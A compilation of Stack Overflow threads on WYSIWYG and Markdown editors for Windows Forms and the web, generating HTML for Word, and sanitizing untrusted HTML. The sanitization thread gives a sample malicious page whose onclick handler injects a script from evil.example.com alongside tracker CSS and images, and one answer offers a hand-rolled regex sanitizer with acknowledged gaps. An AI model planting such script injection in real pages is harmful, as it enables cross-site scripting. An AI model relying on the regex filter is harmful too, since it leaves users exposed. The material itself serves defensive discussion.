A WYSIWYG Markdown control for Windows Forms? - html

[We have a Windows Forms database front-end application that, among other things, can be used as a CMS; clients create the structure, fill it, and then use a ASP.NET WebForms-based site to present the results to publicly on the Web. For added flexibility, they are sometimes forced to input actual HTML markup right into a text field, which then ends up as a varchar in the database. This works, but it's far from user-friendly.]
As such… some clients want a WYSIWYG editor for HTML. I'd like to convince them that they'd benefit from using simpler language (namely, Markdown). Ideally, what I'd like to have is a WYSIWYG editor for that. They don't need tables, or anything sophisticated like that.
A cursory search reveals a .NET Markdown to HTML converter, and then we have a Windows Forms-based text editor that outputs HTML, but apparently nothing that brings the two together. As a result, we'd still have our varchars with markup in there, but at least it would be both quite human-readable and still easily parseable.
Would this — a WYSIWYG editor that outputs Markdown, which is then later on parsed into HTML in ASP.NET — be feasible? Any alternative suggestions?

I think the best approach for this is to combine
Converting Markdown to HTML &
Displaying HTML in WinForms
The most up to date Markdown Library seems to be markdig which you can install via nuget
A simple implementation might be to:
Add a SplitContainer to a Form control, set Dock = Fill
Add a TextBox, set Dock = Fill and set to Multiline = True
Add a WebBrowser, set Dock = Fill
Then handle the TextChanged event, parse the text into html and set to DocumentText like this:
private void textBox1_TextChanged(object sender, EventArgs e)
{
var md = textBox1.Text;
var html = Markdig.Markdown.ToHtml(md);
webBrowser1.DocumentText = html;
}
Here's a recorded demo:

#Soeren,
You can most definitely embed IE with the Javascript Markdown editor inside a Windows Forms application.

the RichTextBox control
So you want to use Markdown but you want the user not to know it? This might not be an achievable goal. I think the point of Markdown is that it is geared toward writers that are willing to learn a little bit of fairly natural syntax and edit everything in plain text (like Wikipedia? are there pure WYSIWYG editors for that? probably... and probably some other Wikipedia editor person has to come and clean up the resulting markup and formatting...). If you want it to be transparent to the user (like MS Word) Markdown may not be what you want or give you the advantages it advertises in that situation.
The input happens in Windows Forms
Oops! Now I understand better your question. I guess it depends on how your Windows Forms app looks whether the embedded IE control sticks out like a sore thumb. If you try it you might find that you can get it to work.[1]
In your position, I would try something like this [2]:
http://wmd-editor.com/examples/splitscreen
If you don't think that sort of arrangement will go over well with your users, (especially all the editing in the text-only window) then once again I don't think Markdown is the answer for your specific application. If you think your users are keen on the idea of editing pure text, then I bet we can find a solution. Please clarify?
Jared.
[1] I had success dropping an IE HTML control into a project strictly to display some generated results as a PDF (using an IE Reader plugin like Adobe Reader or Foxit). The user has no idea that that part of the GUI is an IE control, it just shows the PDF, allows printing and saving, etc.
[2] ...but remove the borders and make the two split controls touch all four edges of the embedded IE control, or get very close... keep it light grey or white, for example, and eliminate any borders of the IE control so it blends into the surrounding controls. Maybe put this on its own tab page and I challenge a non-technical user to tell/care if it's an HTML control or native.
I could totally be wrong about all this (one would have to see this in action to determine if it would work) but it might be easier than writing your own interactive Markdown editor...
...actually to implement your own C# Markdown editor, you could just put a text edit box next to an embedded IE control and run the current Markdown through the .NET Markdown->HTML converter on a separate thread, and replace the HTML in the IE control (assuming the Markdown->HTML converter is very liberal and robust against throwing ANY exceptions).

Can't you just use the same control I'm Stack Overflow uses (that we're all typing into)---WMD, and just store the Markdown in the VARCHAR. Then use the .NET Markdown to HTML converter, as you mentioned, to display the HTML as needed. Jeff talks about this in more detail in a StackOverflow podcast (don't know the episode number).

"WYSIWYG Markdown" is really an oxymoron since the whole point of Markdown is to allow you to write markup syntax naturally and intuitively which is then post-processed into html, unless you mean actually taking for example **text** and rendering it as **text** for example. That would actually be kind of cool, but it would get very difficult for things like numbered and bulleted lists, since you would have to do all the positioning, yet keep everything based on actual textual characters (e.g. '*' instead of the bullet symbol) and support proper textual input positioning, backspace, etc.
For example,
in this bullet list,
the bullets would actually have to be asterisks,
and the spacing would not really be there.
That would certainly be worth paying attention to, if someone did tackle it.

Related

What web admin wysiwyg preview options are available?

I have a web admin where there is a wysiwyg editor when a user edits information.
There is also a view only template.The user views the information before clicking an edit action.
Currently the view template results in one line for the saved field value.
<p><b>Hello</b></p><p>there</p>
What options do I have to al least make the a little more readable when the user is "viewing"?
Options I can think of are:
Leave as it. Well, that can become a long line of text.
Somehow to avoid encoding of MVC3 and to add actual <br> in place of the </p> or <br> that is in the content. At least the lines will break up.
Have the content actually present as html. This is, you will see bold. What if there is an unclosed tag.
With any of the above, i may place it in a scrollable div.
(I had trouble tagging this question. Feel free to retag).
Typically when you are working with editors you are going to eventually be presenting the HTML live on the site anyway, so encoding shouldn't be a big concern as you are already trusting them.
Now, what I've done in the past is with using editors, such as ckeditor, etc, they cleanup the content which would fix the issue with your concern about unclosed tag.
so I would go with option 3 on your list.
Also ensure that any editor you support encoded data before sending to the server. Do not turn off request validation.
Use the [AllowHtml] attribute on a model property if necessary.
Also use the Anti-xss library from Microsoft - specifically the HTML sanitizer to help remove evil script and help protect against cross site scripting.

author html for ms word

my objective is to generate HTML markup to target ms word. So far my findings are, if you have all the styles inline to an element, the document, when opened in word renders properly. However it is lengthy task.
<h1 style="font-family:Arial">Inventory</h1>
This is how I try to achieve formatting. If i want to maintain a constant font across the document, in my HTML, I'd have to add font-family to all the elements like I've done above.
Later, I came across a codeproject article. http://www.codeproject.com/KB/office/Wordyna.aspx Now I am sort of convinced that you can declare the styles globally, but the styling language used and the formatting is not like CSS, and, I think its proprietary to ms word document formatting. I am looking for any tutorials/articles for this styling being used.
ps: I am aware about OpenXML etc, etc. I feel its too complex for me to implement at this point.
Word --should-- open valid (read: not Microsoft's proprietary html-ish mess) without fail as it's the rendering engine for Outlook when you open an HTML email. You could go to the effort to build a document entirely in-line (read: only best practice for Microsoft) as we do for HTML emails, but I suspect there are several different ways to skin this cat.
Personally, if I was trying to get a rich text formatted document from html to Word I'd use a tool such as PHPDocX to build a proper word document natively, then if I really wanted Word HTML I could simply hit save on Word. I've had to do similarly with Excel, where it will accept CSV, but the outcome is always better with XLSX, and there's a similar plugin to easily author a proper XLSX document.
If that's too difficult a route (and it's not that bad, trust me) then I'd stick to formatting following HTML Email rules. Simple guides are all over the web, such as here. And, since Outlook 07-current uses Word's html rendering engine, one could deduce that it has the same limitations listed here

What can I use to sanitize received HTML while retaining basic formatting?

This is a common problem, I'm hoping it's been thoroughly solved for me.
In a system I'm doing for a client, we want to accept HTML from untrusted sources (HTML-formatted email and also HTML files), sanitize it so it doesn't have any scripting, links to external resources, and other security/etc. issues; and then display it safely while not losing the basic formatting. E.g., much as an email client would do with HTML-formatted email, but ideally without repeating the 347,821 mistakes that have been made (so far) in that arena. :-)
The goal is to end up with something we'd feel comfortable displaying to internal users via an iframe in our own web interface, or via the WebBrowser class in a .Net Windows Forms app (which seems to be no safer, possibly less so), etc. Example below.
We recognize that some of this may well muck up the display of the text; that's okay.
We'll be sanitizing the HTML on receipt and storing the sanitized version (don't worry about the storage part — SQL injection and the like — we've got that bit covered).
The software will need to run on Windows Server. COM DLL or .Net assembly preferred. FOSS markedly preferred, but not a deal-breaker.
What I've found so far:
The AntiSamy.Net project (but it appears to no longer be under active development, being over a year behind the main — and active — AntiSamy Java project).
Some code from our very own Jeff Atwood, circa three years ago (gee, I wonder what he was doing...).
The HTML Agility Pack (used by the AntiSamy.Net project above), which would give me a robust parser; then I could implement my own logic for walking through the resulting DOM and filtering out anything I didn't whitelist. The agility pack looks really great, but I'd be relying on my own whitelist rather than reusing a wheel that someone's already invented, so that's a ding against it.
The Microsoft Anti-XSS library
What would you recommend for this task? One of the above? Something else?
For example, we want to remove things like:
script elements
link, img, and such elements that reach out to external resources (probably replace img with the text "[image removed]" or some such)
embed, object, applet, audio, video, and other tags that try to create objects
onclick and similar DOM0 event handler script code
hrefs on a elements that trigger code (even links we think are okay we may well turn into plaintext that users have to intentionally copy and paste into a browser).
__________ (the 722 things I haven't thought of that are the reason I'm looking to leverage something that already exists)
So for instance, this HTML:
<!DOCTYPE html>
<html>
<head>
<title>Example</title>
<link rel="stylesheet" type="text/css" href="http://evil.example.com/tracker.css">
</head>
<body>
<p onclick="(function() { var s = document.createElement('script'); s.src = 'http://evil.example.com/scriptattack.js'; document.body.appendChild(s);)();">
<strong>Hi there!</strong> Here's my nefarious tracker image:
<img src='http://evil.example.com/xparent.gif'>
</p>
</body>
</html>
would become
<!DOCTYPE html>
<html>
<head>
<title>Example</title>
</head>
<body>
<p>
<strong>Hi there!</strong> Here's my nefarious tracker image:
[image removed]
</p>
</body>
</html>
(Note we removed the link and the onclick entirely, and replaced the img with a placeholder. This is just a small subset of what we figure we'll need to strip out.)
This is an older, but still relevant question.
We are using the HtmlSanitizer .Net library, which:
is open-source
is actively maintained
doesn't have the problems like Microsoft Anti-XSS library,
Is unit tested with the
OWASP XSS Filter Evasion Cheat Sheet
is special built for this (in contrast to HTML Agility Pack, which is a parser)
Also on NuGet
I am sensing you would definately need a parser that can generate a XML/DOM source so that you can apply fiter on it to produce what you are looking for.
See if HtmlTidy or Mozilla or HtmlCleaner parsers can help. HtmlCleaner has lot of configurable options which you might also want to look at. Specifically the transform section that allows you to skip the tags you doesn't require.
I would suggest using another approach. If you control the method in which the HTML is viewed I would remove all threats by using a HTML render that doesn't have a ECMA script engine, or any XSS capability. I see you are going to use the built-in WebBrowser object, and rightly so, you want to produce HTML that cannot be used to attack your users.
I recommend looking for a basic HTML display engine. One that cannot parse or understand any of the scripting functionality that would make you vulnerable. All the javascript would just be ignored then.
This does have another problem though. You would need to ensure that the viewer you are using isn't susceptible to other types of attacks.
I suggest looking at http://htmlpurifier.org/. Their library is pretty complete.
Interesting problem, i took some time facing it because there are a lot of things we want to remove from user imput, and even if i do a long list of things to be removed, latter on HTML can evolve and my list would have some holes.
Nonetheless i want users to input some simple things like bold, italic, paragraphs... prety simple.
No doubts the allowed things list is shorter and html can change latter on, that wont make holes on my list unless html stops supports this simple things.
So start thinking otherwise, say just what you allow, with great pain because i'm not an expert on regex (so please some regex people correct me here or improve) i coded this expression and its working form me even before HTML5 arrive.
replace(/(?!<[/]?(b|i|p|br)(\s[^<]*>|[/]>|>))<[^>]*>/gi,"")
(b|i|p|br) <- this is the list of allowed tags, feel free to add some.
this is a startpoint and thats why some regex people should improve to remove also the attributes, like onclick
if i do this:
(?!<[/]?(b|i|p|br)(\s*>|[/]>|>))<[^>]*>
tags with onclick or other stuff will be removed but the corresponding closing tags will remain, and after all we don't want those tags removed we just want to remove the tag attributes.
maybe a second regex pass with
(?!<[^<>\s]+)\s[^</>]+(?=[/>])
am i right? can this be composed into a single pass?
we still have no relation between tags (opening/closing), no great deal till now.
Can the attribute remove be write to remove all not from a white lists? (possibly yes).
a last problem.. when removing tags like script the content remains, its desirable when removing font but not script, well we can do a first pass with
<(script|object|embed)[^>]*>.*</\1>
that will remove certain tags and its content.. but its a black list, meaning you have to keep an eye on it in case html changes.
note: all with "gi"
edit:
joined all the above on this function
String.prototype.sanitizeHTML=function (white,black) {
if (!white) white="b|i|p|br";//allowed tags
if (!black) black="script|object|embed";//complete remove tags
e=new RegExp("(<("+black+")[^>]*>.*</\\2>|(?!<[/]?("+white+")(\\s[^<]*>|[/]>|>))<[^<>]*>|(?!<[^<>\\s]+)\\s[^</>]+(?=[/>]))", "gi");
return this.replace(e,"");
}
-black list -> complete remove tag and content
-white list -> retain tags
other tags are removed but tag content is retained
all attributes of white list tag's (the remaining ones) are removed
still there is place for a white list of attributes (not implemented above) because if i want to preserve IMG then the src must stay... and what about tracking images?

WYSIWYG browser editor that generates *good* HTML?

I'm searching for a "suck less" WYSIWYG in-browser X?HTML editor that generates good HTML code.
(no <font>, <foo style="...">, <p></p><span></span><p><span> </span><span><span>blah</span></<span></p> and so on -- <b> and <i> etc is ok).
Should be easy-to-use as it is going to be used by people that do not know what HTML is.
Any suggestions?
Extra points for Copy-and-Paste-from-Word-readiness! :-)
(I found a lot of editors but they all create that <font> and nested <span> crap that breaks site design and bloats a site with one table up to 100kB.)
Download the current version of CKEditor and look at the XHTML output sample. It shows how to use full WYSIWYG but it doesn't generates font or styles. You just need to adjust the configuration to your needs.
What about WYMEditor?
WYMeditor has been created to generate perfectly structured XHTML strict code, to conform to the W3C XHTML specifications and to facilitate further processing by modern applications.
With WYMeditor, the code can't be contaminated by visual informations like font styles and weights, borders, colors, ... The end-user defines content meaning, which will determine its aspect by the use of style sheets. The result is easy and quick maintenance of information.
I've used it a little and while it takes quite a bit of tweaking if you have very specific needs, it does work out of the box for simple XHTML editing. If you set up specially annotated CSS files then it will detect the styles you want users to use and block level elements to which they apply. You can also tell it how to display these styles in the editor (which might be different from how you want them displayed in the resulting XHTML).
Of course, it generates XHTML, not HTML, so it may not meet your exact needs.
Wikipedia has a category for them:
http://en.wikipedia.org/wiki/Category:JavaScript-based_HTML_editors
You can use Markdown with the WMD UI, it's the one used by Stack Overflow. It always produces valid HTML code.
I just recently searched for an editor to create solid documentation, whose output is suitable for Subversion diffs: https://superuser.com/questions/126621/wysiwyg-editor-for-structured-text-suitable-for-svn-versioning
The editor that was suggested - "KompoZer" - turned out to be fantastic, especially because it generates very clean HTML (in my opinion). And I say that, although I had originally preferred something leaner than HTML.
P.S. Reading your question again, I'm not sure, what you mean with a "browser editor" - are you looking for an editor that can be integrated in an HTML page? KompoZer is based on a browser, but it can probably not be integrated in an HTML page.
I recently switched one of my projects to markdown to avoid this exact issue. There's still a bit of a learning curve for the users but I haven't had to deal with the usual issues that occur when they copy/paste content from Word and wonder why it blew up.
Having said that, I prefer CKEditor over TinyMCE and the Telerik controls. I've generally found it generates somewhat cleaner HTML.
There are several WYSIWG editors for embedding within your website out there.
WYMeditor (http://www.wymeditor.org/) looks very nice and seems to be a good fit for targetting clean and valid XHTML results.
Spaw2. Although it's kinda abandoned now.
The Apple Cocoa NSTextView class exports quite nice html, where all the fiddling is done through specifying a style sheet in the header. The Apple TextEdit editor uses this.
http://tinymce.moxiecode.com/ - easy to use, can import form Word, and restrict formatting to predefined CSS styles, to provide consistent output.
This post is 8+ years old now but still relevant...
I found an awesome github page with a curated list of WYSIWYG editors, including a few WYSIWYM ones which guarantee sane html. As of 2018, the most current and best WYSIWYM one looks like ProseMirror, or maybe ORY Editor if you're looking for something to edit entire webpages(!) in one textfield.

Why do I need Markdown?

Why do I need a Markdown with a front edit editor like WMD? What does the markdown do to the content that’s sent from the WMD editor?
How does Markdown store the content in the backend? Is it the same way like *bold* or in some other format? Why can’t I just do an html encode?
Sorry if I sounded very naïve.

			
				
It's probably helpful to take a step back and ask some of the larger questions. The issue Markdown is trying to solve is that of rich editing in the browser. Consider this: At some point, for any piece of software to enable rich text it has to describe the richness in a some manner, however that may be.
We could call that description of richness (by description of richness I mean like "this bit of text is bold" or "this bit of text is a hyperlink), we could call that description of richness "markup" -- it marks up the text with meta "richness".
Implementations of rich text can take on two approaches, either a.) hide the markup from the user or b.) let them have access to the markup.
For those who choose to hide it, the end result is very often WYSIWYG. The user is oblivious to what is happening behind the scenes. The editor takes care of the details. Think MS Word as an example. No one manipulates the Word markup format as a regular end user.
For implementations which choose to expose the markup, a markup language is then in order to allow users to interacat with it. Such markup languages would be things like HTML doing <tag> or BB code for example, doing things like [tag].
Markdown is one such of these languages.
As opposed to the former types I mentioned, Markdown has tried to design itself so that the markup renders common ASCII people already use. For example, it's common for people to asterisk their text to set it off, *important*, and this notation in Markdown is an indicator of italic.
In regards to storage, as Stephan pointed out, the system will most likely store the raw markdown, because the user will most likely need to have the possibility of editing, and the original markdown can be recalled for that purpose.
In most of the systems I've built, I store the markdown, and then normalize it to a 2nd field which caches the HTML rendering of the markdown. This way I don't have to do markdown->HTML rendering for every markdown field. It takes a little more space, but I'd rather the user have a faster response than use less DB storage space.
Care should also be taken when accepting Markdown from the browser, as it can easily contain <script> tags which need to be filtered out. Most markdown implementations will also recognize HTML intermingled with Markdown formatting, as so to be safe, you need to make sure your inputs and caches are sanitized properly.
The reason for using an alternate encoding system other than HTML is for security
Markdown and other such wiki style encoding systems do not usually support scripting languages
HTML supports scripting languages in many ways (
The two main security issues are:
Malware criminals use scripts in user generated content to attempt malware actions on the content readers computer by scripting to access known security holes
Free loaders using scripts to subvert the rest of the site by changing the content frame or styles i.e. ads, menu's, logos etc. This can also be criminal behaviour if not just annoying
By using an intermediate language such as Markdown you have total control on the rendered output
Filtering HTML is possible, but is also complex and risky
The other significant reason for an alternate encoding system is enforcement of style. Normal HTML has too many options. By limiting the available options, users can only use certain styles. The usually makes for cleaner looking and more readable content (compare SO to Ebay)
The main reason for using Markdown is the readability of a marked text. For instance, you can send it in a plain-text email and the reader will still understand the emphiasis, bullets, the text will be divided in paragraphs et cetera.
When you ask about storing data, it depends. If you enable Markdown in the WordPress blog engine, it stores data as the user has input it - in Markdown. In Stack Overflow, however, it seems like the data is stored as HTML. At least, the "Stack Overflow data dumps" contain HTML, not Markdown (I've seen people complaining) that they have to convert it back).
If you use the WMD editor, you can show the user how the outputs will look like after being converted to HTML. Even though Markdown syntax is really simple, it is not hard to make mistakes. Hence, it is best to show users the output.
Another reason for using Markdown instead of a WYSIWIG control - a WYSIWIG control allows the user to use HTML in data you are displaying on your web page. So, you have to be the one who decides when there is simply incorrect HTML and when it is an evil XSS/CSRF/whatever injection. In Markdown, you simply convert *something* to <b>something</b>, remove any unknow HTML elements and you're done.